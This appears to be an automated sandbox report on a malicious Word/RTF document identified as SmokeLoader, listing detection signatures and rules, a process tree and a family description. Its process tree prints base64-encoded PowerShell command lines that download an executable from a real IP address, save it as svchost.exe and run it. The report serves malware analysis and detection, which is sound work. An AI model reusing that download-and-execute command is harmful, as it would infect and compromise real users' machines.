Windows
Analysis Report
472.rtf.doc
Overview
General Information
Sample name: | 472.rtf.docrenamed because original name is a hash value |
Original sample name: | 472.rtf.doc |
Analysis ID: | 1446716 |
MD5: | 0bd1328012301d04bdc921acb321b820 |
SHA1: | 724612a3c88f187aa000efe4ff4e9e04c9553696 |
SHA256: | 7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66 |
Tags: | docDofoilrtfSmokeLoader |
Infos: | |
Detection
SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected SmokeLoader
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Encrypted powershell cmdline option found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
WINWORD.EXE (PID: 1096 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) cmd.exe (PID: 1408 cmdline:
cmd /c tim eout 3 && Powershell -C $B = [ Text.Encod ing]::Utf8 .GetString ([Convert] ::FromBase 64String(' JFdlYiA9IE 5ldy1PYmpl Y3QgU3lzdG VtLk5ldC5X ZWJDbGllbn Q7ICRVcmwg PSAnaHR0cD ovLzQ1Ljg0 LjAuMTczL2 Rvd25sb2Fk XzIyL3Nlcn Zlci5leGUn OyAkUHRoID 0gIiRlbnY6 VGVtcFxzdm Nob3N0LmV4 ZSI7ICRXZW IuRG93bmxv YWRGaWxlKC RVcmwsICRQ dGgpOyBJbn Zva2UtRXhw cmVzc2lvbi AkUHRoOw== ')); $C = [Convert]: :ToBase64S tring([Tex t.Encoding ]::Unicode .GetBytes( $B)); powe rshell -E $C; MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) timeout.exe (PID: 1900 cmdline:
timeout 3 MD5: 68A0A50CCAD87E1EE1944410A96D066C) powershell.exe (PID: 1432 cmdline:
Powershell -C $B = [ Text.Encod ing]::Utf8 .GetString ([Convert] ::FromBase 64String(' JFdlYiA9IE 5ldy1PYmpl Y3QgU3lzdG VtLk5ldC5X ZWJDbGllbn Q7ICRVcmwg PSAnaHR0cD ovLzQ1Ljg0 LjAuMTczL2 Rvd25sb2Fk XzIyL3Nlcn Zlci5leGUn OyAkUHRoID 0gIiRlbnY6 VGVtcFxzdm Nob3N0LmV4 ZSI7ICRXZW IuRG93bmxv YWRGaWxlKC RVcmwsICRQ dGgpOyBJbn Zva2UtRXhw cmVzc2lvbi AkUHRoOw== ')); $C = [Convert]: :ToBase64S tring([Tex t.Encoding ]::Unicode .GetBytes( $B)); powe rshell -E $C; MD5: A575A7610E5F003CC36DF39E07C4BA7D) powershell.exe (PID: 3084 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -E JABXAGU AYgAgAD0AI ABOAGUAdwA tAE8AYgBqA GUAYwB0ACA AUwB5AHMAd ABlAG0ALgB OAGUAdAAuA FcAZQBiAEM AbABpAGUAb gB0ADsAIAA kAFUAcgBsA CAAPQAgACc AaAB0AHQAc AA6AC8ALwA 0ADUALgA4A DQALgAwAC4 AMQA3ADMAL wBkAG8AdwB uAGwAbwBhA GQAXwAyADI ALwBzAGUAc gB2AGUAcgA uAGUAeABlA CcAOwAgACQ AUAB0AGgAI AA9ACAAIgA kAGUAbgB2A DoAVABlAG0 AcABcAHMAd gBjAGgAbwB zAHQALgBlA HgAZQAiADs AIAAkAFcAZ QBiAC4ARAB vAHcAbgBsA G8AYQBkAEY AaQBsAGUAK AAkAFUAcgB sACwAIAAkA FAAdABoACk AOwAgAEkAb gB2AG8AawB lAC0ARQB4A HAAcgBlAHM AcwBpAG8Ab gAgACQAUAB 0AGgAOwA= MD5: A575A7610E5F003CC36DF39E07C4BA7D) svchost.exe (PID: 3188 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\svchos t.exe" MD5: 92C57DD80B764A028749520017D44E76)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
| |
Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: |